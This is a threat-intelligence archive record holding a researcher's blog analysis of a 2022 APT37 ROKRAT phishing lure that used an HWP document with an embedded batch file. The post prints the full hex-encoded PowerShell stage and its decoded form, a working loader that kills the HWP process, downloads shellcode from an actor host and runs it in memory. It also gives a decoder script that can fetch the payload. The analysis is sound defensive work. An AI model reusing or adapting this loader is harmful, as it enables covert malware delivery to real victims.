{ "id": "be6a2447-2580-4f96-985b-92fd685e0f91", "created_at": "2026-04-06T01:31:00.484466Z", "updated_at": "2026-04-10T03:37:40.68867Z", "deleted_at": null, "sha1_hash": "930cc42115fcbd879cf67403b12c3a3e4e347abe", "title": "RE:archive | APT37's ROKRAT HWP Object Linking and Embedding", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 115663, "plain_text": "RE:archive | APT37's ROKRAT HWP Object Linking and\r\nEmbedding\r\nBy Ovi\r\nPublished: 2024-03-01 · Archived: 2026-04-06 00:32:00 UTC\r\nPlease note: The sample covered in this report is from 2022. I have covered this sample for archiving\r\npurposes and does not pertain to a known recent threat campaign, though the techniques covered may\r\nstill apply.\r\nRE:archive\r\nThis project, aims to cover the reverse engineering of malware and exploits of historic or prior campaigns by APT\r\ngroups. Of course, were possible, I want to cover malware and exploits of current samples, but sometimes this is\r\nnot possible. Either, it's too sensitive to disclose, it wasn't found in my network of people or the sample has not\r\nbeen published. So much of content produced by TI corporations on malware samples is either high-level,\r\nabstracted or sometimes does not disclose samples for reverse engineering. Along my travels, I'm often revisiting\r\nold samples to understand TTPs or evolutions. Retrohunting, is also retroreverse engineering I say.\r\nI came across this brief report I wrote back in 2022 and believe it can be valuable to share here, so sharing it\r\npublicly. Based on my experience with analysing this threat actor, this sample is related to APT37's ROKRAT\r\noperations. I have previously written about ROKRAT impacting Android devices here, however this campaign\r\nspecifically related to Windows devices. In some previous analysis within this project, I also covered\r\nGOLDBACKDOOR dropper malware.\r\nAPT37 \u0026 HWP Object Linking and Embedding\r\nThis is a short report detailing a sample analysis from 2022. The sample contained in this report:\r\n5fec6e533fb9741997530a3d43b60ee44e2e6dc0fd443ef135b9d311b73d92a8\r\nAPT37, is a advance persistent threat group attributed to the North Korean government. It has been active since at\r\nleast 2012 and is known for conducting espionage operations primarily targeting South Korea, Japan, and other\r\nneighboring countries, although it has also been observed targeting entities worldwide.\r\nAPT37 is notable for its advanced capabilities and its use of a wide range of attack techniques, including spear-phishing, malware deployment, and zero-day exploits. The group has been linked to numerous high-profile\r\nattacks, including the targeting of non-profit groups, government agencies, defense contractors, media\r\norganizations, and financial institutions.\r\nOne of APT37's primary objectives appears to be gathering intelligence on political and military issues in the\r\nregion, as well as stealing intellectual property and conducting disruptive or destructive cyber operations. The\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 1 of 10\n\ngroup has been known to use a variety of malware tools, including remote access trojans (RATs) such as\r\nROKRAT.\r\nAPT37's activities are believed to be coordinated and supported by the North Korean government, although the\r\nexact relationship between the group and the state remains somewhat unclear.\r\nFor many researchers, APT37's HWP object linking and embedding document lures are well understood.\r\nHowever, for the purpose of archiving this report will cover a 2022 version of the malware campaign, detailing\r\ngranular details on the campaign. Malicious HWP (Hangul Word Processor) Object Linking and Embedding\r\n(OLE) documents refer to a type of cyber threat where attackers embed harmful content or code within HWP files\r\nusing OLE technology. HWP is a popular word processing software in South Korea, developed by Hancom Inc.,\r\nand OLE is a technology that allows embedding or linking objects (such as documents, images, or multimedia)\r\nfrom one application to another.\r\nIn the context of cyberattacks, attackers may exploit vulnerabilities in HWP software or utilize social engineering\r\ntactics to trick users into opening malicious HWP documents. Once opened, these documents can execute\r\nembedded scripts, launch malware, or exploit system vulnerabilities, potentially leading to data theft, system\r\ncompromise, or further infiltration into the victim's network.\r\nThreat report\r\nSubject: 제20대_대통령선거_선거권자_개표참관인_공개_모집(최종)\r\nTranslated subject: 20th_Presidential Election_Election holders_Votecount Observer_Open_Recruitment\r\n(Final)\r\nSender: 중앙선거관리위원회 공보과 (kopo1scom98@daum.net)\r\nTranslated sender: Public Information Division, Central Election Commission\r\nDiamond model Breakdown:\r\nAdversary: APT37\r\nPersona: kopo1scom98\r\nOrigin: NK\r\nGroup: Characteristics of APT37 \u0026 Kimsuky\r\nVictim: Human rights NGO\r\nCapability: Reflective DLL Injection, HWP Object Linking and Embedding, BAT Scripts\r\nInfrastructure:\r\n- https://[.]work3[.]b4a[.]app/\r\n- Amazon hosted stager 52.87.80.2\r\n\"HTTP/1.1 401 Unauthorized Date: Mon, 08 Aug 2022 14:14:49 GMT Content-Type: application/json;\r\ncharset=utf-8 Content-Length: 24 Connection: keep-alive X-Powered-By: Express ETag: W/\"18-\r\ngH7/fIZxPCVRh6TuPVNAgHt/40I\" \"\r\n- JARM: \"29d29d00029d29d00029d29d29d29d4d0c5eed338ce212ffe821a67732ded8\" (Very generic\r\n[Amazon] - not to be used for specific attribution)\r\nBody:\r\n중앙선거관리위원회는 제20대 대통령선거 개표상황을 참관할 개표참관인을 2월 8일부터 12일까지 공개\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 2 of 10\n\n모집한다.\r\n개표참관인은 개표소 안에서 개표상황을 언제든지 순회·감시 또는 촬영할 수 있고, 개표에 관한 위법사항\r\n을 발견한 때\r\n에는 시정을 요구할 수 있다.\r\n개표참관인 공개 모집은 개표절차의 투명성을 높이기 위해 2016년 제20대 국회의원선거부터 실시하고 있\r\n는 제도이다.\r\n개표참관인이 되려는 사람은 중앙선관위 홈페이지(www.nec.go.kr)에서 본인 인증 후 신청서를 작성하거\r\n나, 주소지 관\r\n할 구·시·군선관위에 서면으로 신청하면 된다.\r\n선거권이 있는 사람은 누구나 신청할 수 있지만, 대한민국 국민이 아니거나 미성년자(18세 미만인 자), 공\r\n무원 등 「공\r\n직선거법」에서 제한하고 있는 사람은 개표참관인이 될 수 없다.\r\nTranslated body:\r\n“The National Election Commission will openly recruit vote counting observers to observe the counting of the\r\n20th presidential election from February 8 to 12. Counting observers may circulate, monitor, or take pictures of\r\nthe counting situation at any time inside the polling station, and when they discover any illegality regarding the\r\ncounting, they may request correction. The open recruitment of vote counting observers is a system that has been\r\nimplemented since the 20th National Assembly election in 2016 to enhance the transparency of the ballot counting\r\nprocess. Those wishing to become a ballot counting observer can either fill out an application form after verifying\r\ntheir identity on the website of the National Election Commission (www.nec.go.kr), or apply in writing to the\r\nGu/Si/Gun Election Commission having jurisdiction over their address. Anyone with the right to vote can apply,\r\nbut non-Korean citizens, minors (those under the age of 18), public\r\nofficials, etc.”\r\nSummary:\r\nThe email contains a HWP Doc which has a embedded OLE object in the form of a BAT script. Once the user\r\nclicks on the OLE object, the BAT script executes which in turn creates a PowerShell-based reflective DLL\r\ninjection attack on the victims machine. The payload is loaded into memory from:\r\nhttps://[.]work3[.]b4a[.]app/\r\nSince the operation loads malicious code directly into memory, there is very little interaction on disk which can\r\ncreate little noise and allows the attacker to be relatively stealthy.\r\nAnalysis Details:\r\nHWP Doc attached contains a OLE object (batch file) which runs. There is a text prompt aimed to get user to\r\nclick. Once clicked the BAT script executes, which is as follows:\r\nFilename: 327.bat\r\nSHA256: 5fec6e533fb9741997530a3d43b60ee44e2e6dc0fd443ef135b9d311b73d92a8\r\n@echo off\r\nIF EXIST \"%PROGRAMFILES(X86)%\" (set pspath=\"%windir%\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe\")\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 3 of 10\n\nELSE (set pspath=\"%windir%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\")\r\nstart \"\" %pspath% -command \"$ttms=\"$eruk2=\"\"\"\"246B6B79343D275B446C6C496D706F727428227573657233322E646C6C22295D2\r\n07075626C6963207374617469632065787465726E20626F6F6C2053686F7757696E646F7728696E742068616E646C652C20696E742073746\r\n17465293B273B246D6D79343D4164642D54797065202D4D656D626572446566696E6974696F6E20246B6B7934202D4E616D6520226B6B793\r\n422202D50617373546872753B246D6D79343A3A53686F7757696E646F7728285B53797374656D2E446961676E6F73746963732E50726F636\r\n573735D3A3A47657443757272656E7450726F636573732829207C204765742D50726F63657373292E4D61696E57696E646F7748616E646C6\r\n52C2030293B246179343D4765742D576D694F626A6563742057696E33325F50726F63657373202D66696C74657220224E616D65206C696B6\r\n520274877702527223B246279343D246179342E4E616D653B246379343D246179342E436F6D6D616E644C696E653B69662824627934297B2\r\n46479343D222F63207461736B6B696C6C202F66202F696D20222B246279343B636D6420246479343B776169742D70726F636573732024627\r\n9342E53706C697428275C2E27295B2D325D3B246579343D246379342E53706C697428272227292E636F756E743B696628246379345B305D2\r\n02D657120272227297B69662824657934202D65712033297B246679343D246379342E53706C697428272227295B325D2E53706C697428272\r\n027295B315D3B7D656C736569662824657934202D65712035297B246679343D246379342E53706C697428272227295B335D3B7D7D656C736\r\n57B69662824657934202D65712033297B246679343D246379342E53706C697428272227295B315D3B7D656C73657B246679343D246379342\r\nE53706C697428272027295B315D3B7D7D246779343D222222222B24656E763A54454D502B225C68686272676F66362E746D70222B2222222\r\n23B246879343D222222222B24656E763A54454D502B225C3332372E626174222B222222223B246979343D222222222B246679342B2222222\r\n23B246479343D222F6320636F7079202F7920222B246779342B2220222B246979343B24706579343D303B24707379343D2730273B646F7B2\r\n4706579342B2B3B24707379343D636D6420246479343B736C65657020313B6966282470657934202D65712035297B627265616B3B7D7D776\r\n8696C652824707379342E5472696D28295B305D202D6E6520273127293B737461727420246979343B7D246A79343D22636D64202F6320646\r\n56C202F6620222B20246779343B636D6420246A79343B246A79343D22636D64202F632064656C202F6620222B20246879343B636D6420246\r\nA79343B5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A5\r\n46F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B246C79343D275B446C6C496D706\r\nF727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6\r\nC6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246C7934202\r\nD4E616D6520224141412220202D50617373546872753B246D7934203D20275B446C6C496D706F727428226B65726E656C33322E646C6C222\r\n95D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E742\r\n0622C75696E7420632C6F757420496E745074722064293B273B246B79343D4164642D54797065202D4D656D626572446566696E6974696F6\r\nE20246D7934202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E5\r\n76562436C69656E743B24643D2268747470733A2F2F776F726B332E6234612E6170702F646F776E6C6F61642E68746D6C3F69643D3838267\r\n365617263683D545568334D3078455A334E50517A52345445524664325A48536E5A61534774315A45644761574A485658464C617A6B77595\r\n5645765575A4965476C694D6C49315447355361466C746547773D223B246E79343D275B446C6C496D706F727428226B65726E656C33322E6\r\n46C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C7\r\n5696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B247179343D4164642D5479706\r\n5202D4D656D626572446566696E6974696F6E20246E7934202D4E616D65202242424222202D50617373546872753B246F79343D275B446C6\r\nC496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220576169744\r\n66F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B247479343D4164642D54797065202D4D656D6265724\r\n46566696E6974696F6E20246F7934202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2\r\n024632E486561646572735B22757365722D6167656E74225D203D2022757575757575757575223B247079343D24632E446F776E6C6F61644\r\n4617461282464293B24757934203D2024623A3A476C6F62616C416C6C6F63283078303034302C20247079342E4C656E6774682B307831303\r\n0293B24727934203D20303B246B79343A3A5669727475616C50726F7465637428247579342C20247079342E4C656E6774682B30783130302\r\nC20307834302C205B7265665D24727934293B666F7220282468203D20303B2468202D6C7420247079342E4C656E6774683B24682B2B29207\r\nB5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282475793\r\n42C2024682C20247079345B24685D293B7D3B7472797B7468726F7720313B7D63617463687B247379343D247179343A3A437265617465546\r\n87265616428302C302C247579342C302C302C30293B247479343A3A57616974466F7253696E676C654F626A65637428247379342C2035303\r\n02A31303030293B7D3B24653D3232323B7D63617463687B736C65657020323B24652B2B3B7D7D7768696C65282465202D6C7420313134293\r\n2022_2_6-”20th_Presidential Election”4B\"\"\"\";\r\n$blwp=\"\"\"\"\"\";\r\nfor($i=0;$i -le $eruk2.Length-2;$i=$i+2){$NTMO=$eruk2[$i]+$eruk2[$i+1];$blwp= $blwp+[char]([convert]::toint16($N\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 4 of 10\n\nTMO,16));};\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($blwp));\";\r\nInvoke-Command -ScriptBlock ([Scriptblock]::Create($ttms));\"\r\nThese campaigns can be decoded quickly using the following script I created, which will decode and allow for\r\nfurther payload extraction. It simply decodes the hexadecimal values in the input using the\r\nextract_hexadecimal_value function, converting them into ASCII characters.\r\n# Script to quickly decode the powershell encoded commands in ROKRAT delivery files.\r\n# It will allow the user to quickly see the decoded result, extract the payload delivery host and have the optio\r\n# @0v1@infosec.exchange\r\n# 0x0v1.com\r\nimport re\r\nimport requests\r\nimport zipfile\r\nimport os\r\ndef extract_hexadecimal_value(userinput):\r\n bulst = \"\"\r\n i = 0\r\n for i in range(0, len(userinput) - 2, 2):\r\n NTMO = userinput[i:i + 2]\r\n bulst += chr(int(NTMO, 16))\r\n return bulst\r\ndef extract_urls(text):\r\n pattern = r'https?://[^\\s\"]+'\r\n urls = re.findall(pattern, text)\r\n return urls\r\ndef download_payload(url):\r\n response = requests.get(url)\r\n if response.status_code == 200:\r\n return response.content\r\n else:\r\n print(\"\\033[91mFailed to download the payload.\\033[0m\")\r\n return None\r\ndef zip_payload(payload, filename):\r\n with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zip_file:\r\n zip_file.setpassword(b\"infected\")\r\n zip_file.writestr(\"payload.bin\", payload)\r\nif __name__ == \"__main__\":\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 5 of 10\n\nuserinput = input(\"Enter the encoded command: \")\r\n value = extract_hexadecimal_value(userinput)\r\n print(\"\\033[93mThe decoded command is:\\033[0m\")\r\n print(value)\r\n urls = extract_urls(value)\r\n if urls:\r\n print(\"\\n\\033[93mExtracted URLs:\\033[0m\")\r\n for idx, url in enumerate(urls, start=1):\r\n print(f\"{idx}. {url}\")\r\n choice = input(\"\\n\\033[96mDo you want to pull the payload? (yes/no):\\033[0m \").strip().lower()\r\n if choice == 'yes':\r\n print(\"\\n\\033[91mWARNING: You are about to download the raw shellcode from the payload delivery URL.\r\n confirm = input(\"\\033[96mDo you wish to continue? (yes/no):\\033[0m \").strip().lower()\r\n if confirm == 'yes':\r\n for idx, url in enumerate(urls, start=1):\r\n payload = download_payload(url)\r\n if payload:\r\n filename = f\"payload_{idx}.zip\"\r\n zip_payload(payload, filename)\r\n print(f\"\\033[92mPayload downloaded and zipped to {filename}.\\033[0m\")\r\n else:\r\n print(\"\\033[91mFailed to download the payload.\\033[0m\")\r\n else:\r\n print(\"\\033[91mDownload aborted.\\033[0m\")\r\n else:\r\n print(\"\\033[91mDownload aborted.\\033[0m\")\r\n else:\r\n print(\"\\n\\033[93mNo URLs found in the value.\\033[0m\")\r\nThe decoded output looks like this:\r\n$kky4='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';\r\n$mmy4=Add-Type -MemberDefinition $kky4 -Name \"kky4\" -PassThru;\r\n$mmy4::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0);\r\n$ay4=Get-WmiObject Win32_Process -filter \"Name like 'Hwp%'\";\r\n$by4=$ay4.Name;\r\n$cy4=$ay4.CommandLine;\r\nif($by4){$dy4=\"/c taskkill /f /im \"+$by4;\r\ncmd $dy4;\r\nwait-process $by4.Split('\\.')[-2];\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 6 of 10\n\n$ey4=$cy4.Split('\"').count;if($cy4[0] -eq '\"')\r\n{if($ey4 -eq 3){$fy4=$cy4.Split('\"')[2].Split(' ')[1];}\r\nelseif($ey4 -eq 5){$fy4=$cy4.Split('\"')[3];}}\r\nelse{\r\nif($ey4 -eq 3){$fy4=$cy4.Split('\"')[1];}\r\nelse{$fy4=$cy4.Split(' ')[1];}}\r\n$gy4=\"\"\"\"+$env:TEMP+\"\\hhbrgof6.tmp\"+\"\"\"\";\r\n$hy4=\"\"\"\"+$env:TEMP+\"\\327.bat\"+\"\"\"\";\r\n$iy4=\"\"\"\"+$fy4+\"\"\"\";\r\n$dy4=\"/c copy /y \"+$gy4+\" \"+$iy4;$pey4=0;\r\n$psy4='0';\r\ndo{\r\n$pey4++;\r\n$psy4=cmd $dy4;\r\nsleep 1;\r\nif($pey4 -eq 5)\r\n{break;}}\r\nwhile($psy4.Trim()[0] -ne '1');\r\nstart $iy4;}\r\n$jy4=\"cmd /c del /f \"+ $gy4;\r\ncmd $jy4;\r\n$jy4=\"cmd /c del /f \"+ $hy4;\r\ncmd $jy4;\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072);\r\n$ly4='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);';\r\n$b=Add-Type -MemberDefinition $ly4 -Name \"AAA\" -PassThru;\r\n$my4 = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr\r\nd);';\r\n$ky4=Add-Type -MemberDefinition $my4 -Name \"AAB\" -PassThru;\r\n$c = New-Object System.Net.WebClient;\r\n$d=\"https://work3.b4a.app/download.html?id=88\u0026search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEd\r\nGaWJHVXFLazkwYUdWeWZIeGliMlI1TG5SaFlteGw=\";\r\n$ny4='[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint\r\ne,IntPtr f);';\r\n$qy4=Add-Type -MemberDefinition $ny4 -Name \"BBB\" -PassThru;\r\n$oy4='[DllImport(\"kernel32.dll\")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';\r\n$ty4=Add-Type -MemberDefinition $oy4 -Name \"DDD\" -PassThru;\r\n$e=112;\r\ndo {\r\ntry { $c.Headers[\"user-agent\"] = \"uuuuuuuuu\";\r\n$py4=$c.DownloadData($d);\r\n$uy4 = $b::GlobalAlloc(0x0040, $py4.Length+0x100);\r\n2022_2_6-”20th_Presidential Election”5$ry4 = 0;\r\n$ky4::VirtualProtect($uy4, $py4.Length+0x100, 0x40, [ref]$ry4);\r\nfor ($h = 0;$h -lt $py4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($uy4, $h, $py4[$h]);};\r\ntry{throw 1;}\r\ncatch{$sy4=$qy4::CreateThread(0,0,$uy4,0,0,0);\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 7 of 10\n\n$ty4::WaitForSingleObject($sy4, 500*1000);};$e=222;}\r\ncatch{sleep 2;$e++;}}while($e -lt 114);\r\nA very similar sample described here: Malicious HWP Files with BAT Scripts Being Distributed Actively (North\r\nKorea/National Defense/Broadcasting) - ASEC BLOG (ahnlab.com)\r\nAt the time of writing, the shellcode stager was down, so unable to pull the shellcode that is loaded into memory.\r\nhttps://work3.b4a.app/download.html?id=88\u0026search=TUh3M0xEZ3NPQzR4TERFd2ZHSnZaSGt1ZEdGaWJHVXFLazkwYUdWeWZIeGliMl\r\nThe sample utilising Add-Type cmdlet to add definitions of classes. First it creates this class called kky4\r\n$kky4='[DllImport(\"user32.dll\")] public static extern bool ShowWindow(int handle, int state);';\r\n$mmy4=Add-Type -MemberDefinition $kky4 -Name \"kky4\" -PassThru;\r\n$mmy4::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0)\r\nWhen Add-Type cmdlet is executed, CSC.exe (Visual C# Command-Line compiler) is invoked on the host by\r\nPowerShell, this is a notable TTP to observe on victims (Powershell.exe → CSC.exe → cvtres.exe). CSC is used\r\nto compile this class definition into an assembly to be used by the PowerShell script. A temporary file\r\nis created inside %appdata%\\local\\temp with the extension .cmdline. In this case, our sample creates this file\r\nC:\\Users\\Louise\\AppData\\Local\\Temp\\uzicvxsd\\uzicvxsd.cmdline:\r\n/t:library /utf8output /R:\"System.dll\" /R:\"C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automati\r\non\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll\" /R:\"System.Core.dll\" /out:\"C:\\Users\\Louise\\A\r\nppData\\Local\\Temp\\uzicvxsd\\uzicvxsd.dll\" /debug- /optimize+ /warnaserror /optimize+ \"C:\\Users\\Louise\\AppData\\Lo\r\ncal\\Temp\\uzicvxsd\\uzicvxsd.0.cs\"\r\nSince all the files are removed once the Add-Type terminates, this attack methodology allows for a relatively low\r\nfile impact on the disk, supporting the attackers obfuscation. The script utilising WMI to looks for HWP and kill\r\nthe process. This is a notable pattern since this is not common. It then performs some cleanup operations on two\r\nfiles, hhbrgof6.tmp \u0026 327.bat.\r\n$ay4=Get-WmiObject Win32_Process -filter \"Name like 'Hwp%'\";\r\n$by4=$ay4.Name;\r\n$cy4=$ay4.CommandLine;\r\nif($by4){$dy4=\"/c taskkill /f /im \"+$by4;\r\ncmd $dy4;\r\nwait-process $by4.Split('\\.')[-2];\r\n$ey4=$cy4.Split('\"').count;if($cy4[0] -eq '\"')\r\n{if($ey4 -eq 3){$fy4=$cy4.Split('\"')[2].Split(' ')[1];}\r\nelseif($ey4 -eq 5){$fy4=$cy4.Split('\"')[3];}}\r\nelse{\r\n2022_2_6-”20th_Presidential Election”6if($ey4 -eq 3){$fy4=$cy4.Split('\"')[1];}\r\nelse{$fy4=$cy4.Split(' ')[1];}}\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 8 of 10\n\n$gy4=\"\"\"\"+$env:TEMP+\"\\hhbrgof6.tmp\"+\"\"\"\";\r\n$hy4=\"\"\"\"+$env:TEMP+\"\\327.bat\"+\"\"\"\";\r\n$iy4=\"\"\"\"+$fy4+\"\"\"\";\r\n$dy4=\"/c copy /y \"+$gy4+\" \"+$iy4;\r\n$pey4=0;\r\n$psy4='0';\r\ndo{\r\n$pey4++;\r\n$psy4=cmd $dy4;\r\nsleep 1;\r\nif($pey4 -eq 5)\r\n{break;}}\r\nwhile($psy4.Trim()[0] -ne '1');\r\nstart $iy4;}\r\n$jy4=\"cmd /c del /f \"+ $gy4;\r\ncmd $jy4;\r\n$jy4=\"cmd /c del /f \"+ $hy4;\r\ncmd $jy4;\r\nThey then set SSL/TLS secure channel using TLS12\r\n[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)\r\nFollowed by the further creation of additional classes this time importing Kernel32 in order to access GlobalAlloc\r\nand VirtualProtect methods:\r\n$ly4='[DllImport(\"kernel32.dll\")]public static extern IntPtr GlobalAlloc(uint b,uint c);';\r\n$b=Add-Type -MemberDefinition $ly4 -Name \"AAA\" -PassThru;\r\n$my4 = '[DllImport(\"kernel32.dll\")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d)\r\n$ky4=Add-Type -MemberDefinition $my4 -Name \"AAB\" -PassThru;\r\nThe C2 is declared to variable.\r\nThey then allocates memory for the shellcode\r\n$uy4 = $b::GlobalAlloc(0x0040, $py4.Length+0x100)\r\nFollowed by utilising VirtualProtect to make the memory section executable.\r\n$ky4::VirtualProtect($uy4, $py4.Length+0x100, 0x40, [ref]$ry4);\r\nAnd lastly, writing the bytes from the downloaded assembly, creating a threat for the executable code and calls\r\nWaitForSingleObject to wait for the thread to end.\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 9 of 10\n\nor ($h = 0;$h -lt $py4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($uy4, $h, $py4[$h]);};\r\ntry{throw 1;}\r\ncatch{$sy4=$qy4::CreateThread(0,0,$uy4,0,0,0);\r\n$ty4::WaitForSingleObject($sy4, 500*1000);};\r\n$e=222;}\r\ncatch{sleep 2;$e++;}}\r\nwhile($e -lt 114);\r\nUnfortunately, since the shellcode stager is down, no further analysis can be conducted on shellcode loaded into\r\nmemory. Upon completion, malicious shellcode will be executed in memory. This infrastructure was later seen\r\nutlitsed deploying ROKRAT samples, so I am assuming here that the shellcode would have resulted in ROKRAT\r\ngiven my experience with this threat actor.\r\nIf you like this work, please consider subscribing for more content \u0026 tiered access.\r\nSign up for [0x0v1]\r\nBlog of researcher \u0026 writer Ovi. Disrupting APTs, hostile gov'ts, surveillance, privacy violations, centralization \u0026\r\ncorporate injustice.\r\nNo spam. Unsubscribe anytime.\r\nSource: https://www.0x0v1.com/rearchive-rokrat-hwp/\r\nhttps://www.0x0v1.com/rearchive-rokrat-hwp/\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.0x0v1.com/rearchive-rokrat-hwp/" ], "report_names": [ "rearchive-rokrat-hwp" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2", "created_at": "2022-10-25T15:50:23.280374Z", "updated_at": "2026-04-10T02:00:05.305572Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "Kimsuky", "Black Banshee", "Velvet Chollima", "Emerald Sleet", "THALLIUM", "APT43", "TA427", "Springtail" ], "source_name": "MITRE:Kimsuky", "tools": [ "Troll Stealer", "schtasks", "Amadey", "GoBear", "Brave Prince", "CSPY Downloader", "gh0st RAT", "AppleSeed", "Gomir", "NOKKI", "QuasarRAT", "Gold Dragon", "PsExec", "KGH_SPY", "Mimikatz", "BabyShark", "TRANSLATEXT" ], "source_id": "MITRE", "reports": null }, { "id": "760f2827-1718-4eed-8234-4027c1346145", "created_at": "2023-01-06T13:46:38.670947Z", "updated_at": "2026-04-10T02:00:03.062424Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "G0086", "Emerald Sleet", "THALLIUM", "Springtail", "Sparkling Pisces", "Thallium", "Operation Stolen Pencil", "APT43", "Velvet Chollima", "Black Banshee" ], "source_name": "MISPGALAXY:Kimsuky", "tools": [ "xrat", "QUASARRAT", "RDP Wrapper", "TightVNC", "BabyShark", "RevClient" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d", "created_at": "2025-08-07T02:03:25.101147Z", "updated_at": "2026-04-10T02:00:03.846812Z", "deleted_at": null, "main_name": "NICKEL KIMBALL", "aliases": [ "APT43 ", "ARCHIPELAGO ", "Black Banshee ", "Crooked Pisces ", "Emerald Sleet ", "ITG16 ", "Kimsuky ", "Larva-24005 ", "Opal Sleet ", "Ruby Sleet ", "SharpTongue ", "Sparking Pisces ", "Springtail ", "TA406 ", "TA427 ", "THALLIUM ", "UAT-5394 ", "Velvet Chollima " ], "source_name": "Secureworks:NICKEL KIMBALL", "tools": [ "BabyShark", "FastFire", "FastSpy", "FireViewer", "Konni" ], "source_id": "Secureworks", "reports": null }, { "id": "71a1e16c-3ba6-4193-be62-be53527817bc", "created_at": "2022-10-25T16:07:23.753455Z", "updated_at": "2026-04-10T02:00:04.73769Z", "deleted_at": null, "main_name": "Kimsuky", "aliases": [ "APT 43", "Black Banshee", "Emerald Sleet", "G0086", "G0094", "ITG16", "KTA082", "Kimsuky", "Larva-24005", "Larva-25004", "Operation Baby Coin", "Operation Covert Stalker", "Operation DEEP#DRIVE", "Operation DEEP#GOSU", "Operation Kabar Cobra", "Operation Mystery Baby", "Operation Red Salt", "Operation Smoke Screen", "Operation Stealth Power", "Operation Stolen Pencil", "SharpTongue", "Sparkling Pisces", "Springtail", "TA406", "TA427", "Thallium", "UAT-5394", "Velvet Chollima" ], 